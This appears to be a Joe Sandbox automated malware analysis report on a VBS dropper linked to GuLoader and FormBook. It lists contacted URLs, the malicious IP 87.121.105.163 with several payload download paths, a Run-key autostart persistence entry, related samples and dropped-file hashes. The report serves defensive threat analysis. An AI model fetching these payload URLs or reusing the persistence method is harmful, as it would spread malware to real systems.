                              http://crl.ssc.lt/root-b/cacrl.crl0wscript.exe, 00000000.00000003.2014678394.000001B66CDD3000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000005.00000002.2474889182.0000000004F04000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0wscript.exe, 00000000.00000003.2014759639.000001B66CDBC000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://web.ncdc.gov.sa/crl/nrcacomb1.crl0wscript.exe, 00000000.00000003.2014920806.000001B66CDBA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014793443.000001B66CDAE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014830264.000001B66CDBA000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.certicamara.com/dpc/0Zwscript.exe, 00000000.00000003.2014942835.000001B66CD80000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0Gwscript.exe, 00000000.00000003.2014759639.000001B66CDBC000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://go.micropowershell.exe, 00000002.00000002.2624324723.000001CB01389000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://wwww.certigna.fr/autorites/0mwscript.exe, 00000000.00000003.2014522538.000001B66CEB3000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.dnie.es/dpc0wscript.exe, 00000000.00000003.2014830264.000001B66CD91000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf0wscript.exe, 00000000.00000003.2014678394.000001B66CDD3000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://contoso.com/Iconpowershell.exe, 00000005.00000002.2478265897.0000000005E17000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://87.121.105.163powershell.exe, 00000002.00000002.2624324723.000001CB00223000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2624324723.000001CB01E84000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • 18%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://ca.mtin.es/mtin/DPCyPoliticas0wscript.exe, 00000000.00000003.2014759639.000001B66CDBC000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://www.anf.es/AC/ANFServerCA.crl0wscript.exe, 00000000.00000003.2015404722.000001B66CD7E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014996011.000001B66CD76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2016665644.000001B66CD7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://repository.tsp.zetes.com0wscript.exe, 00000000.00000003.2014551191.000001B66CDEC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014661712.000001B66CDF1000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.globaltrust.info0wscript.exe, 00000000.00000003.2014551191.000001B66CDEC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014585557.000001B66CDF7000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://certificates.starfieldtech.com/repository/1604wscript.exe, 00000000.00000003.2014678394.000001B66CDD3000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      http://acedicom.edicomgroup.com/doc0wscript.exe, 00000000.00000003.2015360503.000001B66AF82000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        http://www.certplus.com/CRL/class3TS.crl0wscript.exe, 00000000.00000003.2015316928.000001B66CD67000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://github.com/Pester/Pesterpowershell.exe, 00000005.00000002.2474889182.0000000004F04000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://crl.anf.es/AC/ANFServerCA.crl0wscript.exe, 00000000.00000003.2015404722.000001B66CD7E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014996011.000001B66CD76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2016665644.000001B66CD7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://www.certeurope.fr/reference/pc-root2.pdf0wscript.exe, 00000000.00000003.2015316928.000001B66CD67000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              http://ac.economia.gob.mx/last.crl0Gwscript.exe, 00000000.00000003.2014551191.000001B66CDEC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2016747138.000001B66CDEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014661712.000001B66CDF1000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://87.121.105.163/Stereotyperingens72.xsnXRyl4powershell.exe, 00000005.00000002.2474889182.0000000004F04000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.catcert.net/verarrelwscript.exe, 00000000.00000003.2014522538.000001B66CEB3000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://www.disig.sk/ca0fwscript.exe, 00000000.00000003.2014522538.000001B66CEB3000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://87.121.105.163/wab.exe, 00000008.00000003.2709804128.0000000006A3B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.2806420134.0000000006A3B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2709595724.0000000006A39000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • 18%, Virustotal, Browse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0wscript.exe, 00000000.00000003.2014812401.000001B66CDA6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                http://www.e-szigno.hu/RootCA.crlwscript.exe, 00000000.00000003.2014522538.000001B66CEB3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.sk.ee/juur/crl/0wscript.exe, 00000000.00000003.2014678394.000001B66CDD3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://crl.chambersign.org/chambersignroot.crl0wscript.exe, 00000000.00000003.2014551191.000001B66CDEC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014585557.000001B66CDF7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://crl.xrampsecurity.com/XGCA.crl0wscript.exe, 00000000.00000003.2014886520.000001B66CD8B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://certs.oati.net/repository/OATICA2.crl0wscript.exe, 00000000.00000003.2014678394.000001B66CDD3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://crl.oces.trust2408.com/oces.crl0wscript.exe, 00000000.00000003.2014678394.000001B66CDD3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.quovadis.bm0wscript.exe, 00000000.00000003.2015360503.000001B66AF82000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://crl.ssc.lt/root-a/cacrl.crl0wscript.exe, 00000000.00000003.2014678394.000001B66CDD3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://certs.oaticerts.com/repository/OATICA2.crlwscript.exe, 00000000.00000003.2014678394.000001B66CDD3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://certs.oati.net/repository/OATICA2.crt0wscript.exe, 00000000.00000003.2014678394.000001B66CDD3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.accv.es00wscript.exe, 00000000.00000003.2014812401.000001B66CDA6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.pkioverheid.nl/policies/root-policy-G20wscript.exe, 00000000.00000003.2014678394.000001B66CDD3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://www.netlock.net/docswscript.exe, 00000000.00000003.2014830264.000001B66CD91000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0wscript.exe, 00000000.00000003.2014759639.000001B66CDBC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.e-trust.be/CPS/QNcertswscript.exe, 00000000.00000003.2014484947.000001B66CEC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014759639.000001B66CDBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014830264.000001B66CD91000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://ocsp.ncdc.gov.sa0wscript.exe, 00000000.00000003.2014920806.000001B66CDBA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014793443.000001B66CDAE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014830264.000001B66CDBA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://fedir.comsign.co.il/crl/ComSignCA.crl0wscript.exe, 00000000.00000003.2015360503.000001B66AF82000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://acraiz.icpbrasil.gov.br/LCRacraizv5.crl0wscript.exe, 00000000.00000003.2014678394.000001B66CDD3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://crl2.postsignum.cz/crl/psrootqca4.crl01wscript.exe, 00000000.00000003.2014830264.000001B66CD91000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0wscript.exe, 00000000.00000003.2014830264.000001B66CD91000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://web.ncdc.gov.sa/crl/nrcaparta1.crlwscript.exe, 00000000.00000003.2014920806.000001B66CDBA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014793443.000001B66CDAE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014830264.000001B66CDBA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.datev.de/zertifikat-policy-int0wscript.exe, 00000000.00000003.2014812401.000001B66CDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014678394.000001B66CDD3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://fedir.comsign.co.il/crl/comsignglobalrootca.crl0;wscript.exe, 00000000.00000003.2014830264.000001B66CD91000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://repository.luxtrust.lu0wscript.exe, 00000000.00000003.2014484947.000001B66CEC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://cps.chambersign.org/cps/chambersroot.html0wscript.exe, 00000000.00000003.2014759639.000001B66CDBC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://contoso.com/Licensepowershell.exe, 00000005.00000002.2478265897.0000000005E17000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.acabogacia.org0wscript.exe, 00000000.00000003.2014759639.000001B66CDBC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.firmaprofesional.com/cps0wscript.exe, 00000000.00000003.2014830264.000001B66CD91000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        http://www.uce.gub.uy/acrn/acrn.crl0wscript.exe, 00000000.00000003.2014759639.000001B66CDBC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs
                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        87.121.105.163
                                                        unknownBulgaria
                                                        43561NET1-ASBGfalse
                                                        47.91.88.207
                                                        www.tyaer.comUnited States
                                                        45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCtrue
                                                        IP
                                                        127.0.0.1
                                                        Joe Sandbox version:40.0.0 Tourmaline
                                                        Analysis ID:1431505
                                                        Start date and time:2024-04-25 11:02:05 +02:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 9m 47s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Number of analysed new started processes analysed:15
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:1
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample name:FTG_PD_04024024001.vbs
                                                        Detection:MAL
                                                        Classification:mal100.troj.spyw.expl.evad.winVBS@19/10@4/3
                                                        EGA Information:
                                                        • Successful, ratio: 60%
                                                        HCA Information:
                                                        • Successful, ratio: 97%
                                                        • Number of executed functions: 143
                                                        • Number of non-executed functions: 298
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .vbs
                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                        • Excluded IPs from analysis (whitelisted): 199.232.214.172, 23.40.205.49, 23.40.205.34, 72.21.81.240
                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-bg-shim.trafficmanager.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net
                                                        • Execution Graph export aborted for target powershell.exe, PID 4268 because it is empty
                                                        • Execution Graph export aborted for target powershell.exe, PID 5328 because it is empty
                                                        • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                        TimeTypeDescription
                                                        11:02:54API Interceptor1x Sleep call for process: wscript.exe modified
                                                        11:02:58API Interceptor119x Sleep call for process: powershell.exe modified
                                                        11:04:15AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run AJ5HR8DXLPTX C:\Program Files (x86)\windows mail\wab.exe
                                                        11:04:24AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run AJ5HR8DXLPTX C:\Program Files (x86)\windows mail\wab.exe
                                                        11:04:49API Interceptor8x Sleep call for process: AtBroker.exe modified
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        87.121.105.163Doc_004024024001.batGet hashmaliciousFormBook, GuLoaderBrowse
                                                        • 87.121.105.163/TjtonPwEiP175.bin
                                                        Ordine_doc_419024001904.wsfGet hashmaliciousFormBook, GuLoaderBrowse
                                                        • 87.121.105.163/icjFpYDkBweqyeZ252.bin
                                                        PO_La-Tanerie04180240124.batGet hashmaliciousFormBook, GuLoaderBrowse
                                                        • 87.121.105.163/vhhJQWfiJN142.bin
                                                        Pedido02304024.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                        • 87.121.105.163/fBizb192.bin
                                                        BRUFEN ORDER VAC442_7467247728478134247.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 87.121.105.163/DtExZZndAxdvvlCKCcIVF127.bin
                                                        SCMP_#U547d#U4ee4_004020024001.wsfGet hashmaliciousUnknownBrowse
                                                        • 87.121.105.163/Assumes122.java
                                                        PO_La-Tannerie04190240419.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                        • 87.121.105.163/kvRPYpXycVNsTooeadG247.bin
                                                        HTMCDevalueringstidspunkts2024.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 87.121.105.163/dFQwNyOh122.bin
                                                        rOferta_SKGNMECLemnedefinitionen353523577.wsfGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 87.121.105.163/DtExZZndAxdvvlCKCcIVF127.bin
                                                        Ordine_doc_419024001904.batGet hashmaliciousFormBook, GuLoaderBrowse
                                                        • 87.121.105.163/icjFpYDkBweqyeZ252.bin
                                                        47.91.88.207Doc_004024024001.batGet hashmaliciousFormBook, GuLoaderBrowse
                                                          Ordine_doc_419024001904.wsfGet hashmaliciousFormBook, GuLoaderBrowse
                                                            PO_La-Tanerie04180240124.batGet hashmaliciousFormBook, GuLoaderBrowse
                                                              Pedido02304024.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                PO_La-Tannerie04190240419.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  Ordine_doc_419024001904.batGet hashmaliciousFormBook, GuLoaderBrowse
                                                                    PO_La-Tanerie04180240124.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      PO_La-Tanerie04180240124.batGet hashmaliciousFormBook, GuLoaderBrowse
                                                                        f4CdNDrJp8.exeGet hashmaliciousFormBookBrowse
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          www.tyaer.comDoc_004024024001.batGet hashmaliciousFormBook, GuLoaderBrowse
                                                                          • 47.91.88.207
                                                                          Ordine_doc_419024001904.wsfGet hashmaliciousFormBook, GuLoaderBrowse
                                                                          • 47.91.88.207
                                                                          PO_La-Tanerie04180240124.batGet hashmaliciousFormBook, GuLoaderBrowse
                                                                          • 47.91.88.207
                                                                          Pedido02304024.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                          • 47.91.88.207
                                                                          PO_La-Tannerie04190240419.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                          • 47.91.88.207
                                                                          Ordine_doc_419024001904.batGet hashmaliciousFormBook, GuLoaderBrowse
                                                                          • 47.91.88.207
                                                                          PO_La-Tanerie04180240124.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                          • 47.91.88.207
                                                                          PO_La-Tanerie04180240124.batGet hashmaliciousFormBook, GuLoaderBrowse
                                                                          • 47.91.88.207
                                                                          f4CdNDrJp8.exeGet hashmaliciousFormBookBrowse
                                                                          • 47.91.88.207
                                                                          bg.microsoft.map.fastly.netSWIFT.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                          • 199.232.210.172
                                                                          https://docs.google.com/presentation/d/e/2PACX-1vRA7cYu2pjKyfaCRROgTu4J2OpPGWE_raEqtGhCVl21QDvJzZsVPQtIU_FG6khcCjqxbwzOTOoBBBx6/pub?start=false&loop=false&delayms=3000&slide=id.pGet hashmaliciousUnknownBrowse
                                                                          • 199.232.214.172
                                                                          page97.exeGet hashmaliciousLonePageBrowse
                                                                          • 199.232.210.172
                                                                          Minutes_of_15th_Session_of_PSC.pdf.exeGet hashmaliciousUnknownBrowse
                                                                          • 199.232.210.172
                                                                          KMj8h32vWy.exeGet hashmaliciousAsyncRAT, PureLog StealerBrowse
                                                                          • 199.232.214.172
                                                                          https://cos-aliyun8789.towqzg.cn/Get hashmaliciousUnknownBrowse
                                                                          • 199.232.210.172
                                                                          https://shining-melodic-magnesium.glitch.me/rvicendDev.htmlGet hashmaliciousUnknownBrowse
                                                                          • 199.232.210.172
                                                                          https://univ-paris13-4.laviewddns.com/login.php?wa=wsignin1.0&client_id=fe9c55ad-8a94-46b2-a3c3-816799478139Get hashmaliciousUnknownBrowse
                                                                          • 199.232.214.172
                                                                          https://univ-paris13.laviewddns.com/login.php?wa=wsignin1.0&client_id=fe9c55ad-8a94-46b2-a3c3-816799478139Get hashmaliciousUnknownBrowse
                                                                          • 199.232.210.172
                                                                          https://fassouyatajadalravuij.blob.core.windows.net/fassouyatajadalravuij/1.html?KIUS8wH0YY7cB2NMwxGsVoa5iezV7W9cvLqamEPM8HdxqBLgYyX6Goh6aNwgjitRkRWLcAfZPzQwfAIRlIAPQ3jfogxjD1t9nA60#cl/26081_md/7/18507/5419/19036/1614238Get hashmaliciousPhisherBrowse
                                                                          • 199.232.210.172
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          NET1-ASBGDoc_004024024001.batGet hashmaliciousFormBook, GuLoaderBrowse
                                                                          • 87.121.105.163
                                                                          Ordine_doc_419024001904.wsfGet hashmaliciousFormBook, GuLoaderBrowse
                                                                          • 87.121.105.163
                                                                          http://94.156.79.129/x86_64Get hashmaliciousUnknownBrowse
                                                                          • 94.156.79.129
                                                                          http://94.156.79.129/i686Get hashmaliciousUnknownBrowse
                                                                          • 94.156.79.129
                                                                          0ADLfPX6HX.elfGet hashmaliciousUnknownBrowse
                                                                          • 94.156.79.77
                                                                          WQiDRxwDWv.elfGet hashmaliciousUnknownBrowse
                                                                          • 94.156.8.57
                                                                          i6MGE0UeYG.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                          • 93.123.85.78
                                                                          xBIc1DYAU8.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                          • 93.123.85.78
                                                                          QVorHPgh3b.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                          • 93.123.85.78
                                                                          Ptge3TuHFs.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                          • 93.123.85.78
                                                                          CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCDoc_004024024001.batGet hashmaliciousFormBook, GuLoaderBrowse
                                                                          • 47.91.88.207
                                                                          Ordine_doc_419024001904.wsfGet hashmaliciousFormBook, GuLoaderBrowse
                                                                          • 47.91.88.207
                                                                          8dToMPcvO1.elfGet hashmaliciousMiraiBrowse
                                                                          • 8.222.188.22
                                                                          PO_La-Tanerie04180240124.batGet hashmaliciousFormBook, GuLoaderBrowse
                                                                          • 47.91.88.207
                                                                          Pedido02304024.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                          • 47.91.88.207
                                                                          xzk9TKqNoI.elfGet hashmaliciousMiraiBrowse
                                                                          • 147.139.212.194
                                                                          b3astmode.x86.elfGet hashmaliciousUnknownBrowse
                                                                          • 8.220.214.169
                                                                          PO_La-Tannerie04190240419.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                          • 47.91.88.207
                                                                          Ordine_doc_419024001904.batGet hashmaliciousFormBook, GuLoaderBrowse
                                                                          • 47.91.88.207
                                                                          2.jpg.exeGet hashmaliciousCobaltStrike, Metasploit, ReflectiveLoaderBrowse
                                                                          • 8.218.236.5
                                                                          No context
                                                                          No context
                                                                          Process:C:\Windows\System32\wscript.exe
                                                                          File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                          Category:dropped
                                                                          Size (bytes):69993
                                                                          Entropy (8bit):7.99584879649948
                                                                          Encrypted:true
                                                                          SSDEEP:1536:iMveRG6BWC7T2g1wGUa5QUoaIB9ttiFJG+AOQOXl0Usvwr:feRG6BX6gUaHo9tkBHiUewr
                                                                          MD5:29F65BA8E88C063813CC50A4EA544E93
                                                                          SHA1:05A7040D5C127E68C25D81CC51271FFB8BEF3568
                                                                          SHA-256:1ED81FA8DFB6999A9FEDC6E779138FFD99568992E22D300ACD181A6D2C8DE184
                                                                          SHA-512:E29B2E92C496245BED3372578074407E8EF8882906CE10C35B3C8DEEBFEFE01B5FD7F3030ACAA693E175F4B7ACA6CD7D8D10AE1C731B09C5FA19035E005DE3AA
                                                                          Malicious:false
                                                                          Preview:MSCF....i.......,...................I.................oXAy .authroot.stl.Ez..Q6..CK..<Tk...p.k..1...3...[..%Y.f..."K.6)..[*I.hOB."..rK.RQ*..}f..f...}....9.|.....gA...30.,O2L...0..%.U...U.t.....`dqM2.x..t...<(uad.c...x5V.x..t..agd.v......i...KD..q(. ...JJ......#..'=. ...3.x...}...+T.K..!.'.`w .!.x.r.......YafhG..O.3....'P[..'.D../....n..t....R<..=\E7L0?{..T.f...ID...,...r....3z..O/.b.Iwx.. .o...a\.s........."..'.......<;s.[...l...6.)ll..B.P.....k.... k0.".t!/.,........{...P8....B..0(.. .Q.....d...q,\.$.n.Q.\.p...R..:.hr./..8.S<a.s...+#3....D..h1.a.0....{.9.....:e.......n.~G.{.M.1..OU.....B.Q..y_>.P{...}i.=.a..QQT.U..|!.pyCD@.....l..70..w..)...W^.`l...%Y.\................i..=hYV.O8W@P.=.r.=..1m..1....)\.p..|.c.3..t..[...).....l.{.Y....\S.....y....[.mCt....Js;...H....Q..F.....g.O...[..A.=...F[..z....k...mo.lW{`....O...T.g.Y.Uh.;m.'.N..f..}4..9i..t4p_bI..`.....Ie..l.P.... ...Lg......[....5g...~D.s.h'>n.m.c.7...-..P.gG...i$...v.m.b[.yO.P/*.YH.
                                                                          Process:C:\Windows\System32\wscript.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):330
                                                                          Entropy (8bit):3.236117150252365
                                                                          Encrypted:false
                                                                          SSDEEP:6:kKqXlEN+SkQlPlEGYRMY9z+4KlDA3RUeVlWI/Vt:4lbkPlE99SNxAhUeVLVt
                                                                          MD5:3B5F16AF7CBA1AB2C735F98B8CA95996
                                                                          SHA1:E8DABC4D27272134AC684E63A2C3333A49FDAD0B
                                                                          SHA-256:28A3E10D86C5F104FFDBB27A6F39B34A926D3542D1064CC39C7E5AC086583803
                                                                          SHA-512:CF6ADCC5A704CA3159E4839E26660144CFFCEFE7F1BC27B23F2A1146ACF283938E12820D6D07FFF2A6FD414020A49C2526F8FA646DE9D071794671D22E1A05F8
                                                                          Malicious:false
                                                                          Preview:p...... ........y..\...(....................................................... ........M.........(.....wl....i...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".b.3.6.8.5.3.8.5.a.4.7.f.d.a.1.:.0."...
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:modified
                                                                          Size (bytes):11608
                                                                          Entropy (8bit):4.886255615007755
                                                                          Encrypted:false
                                                                          SSDEEP:192:Pxoe5lpOdxoe56ib49Vsm5emdiVFn3eGOVpN6K3bkkjo5agkjDt4iWN3yBGHB9sT:lVib49+VoGIpN6KQkj2xkjh4iUx4cYK6
                                                                          MD5:C7F7A26360E678A83AFAB85054B538EA
                                                                          SHA1:B9C885922370EE7573E7C8CF0DDB8D97B7F6F022
                                                                          SHA-256:C3D527BCA7A1D1A398F5BE0C70237BD69281601DFD7D1ED6D389B2FD8E3BC713
                                                                          SHA-512:9F2F9DA5F4BF202A08BADCD4EF9CE159269EF47B657C6F67DC3C9FDB4EE0005CE5D0A9B4218DB383BAD53222B728B77B591CB5F41781AB30EF145CC7DB7D4F77
                                                                          Malicious:false
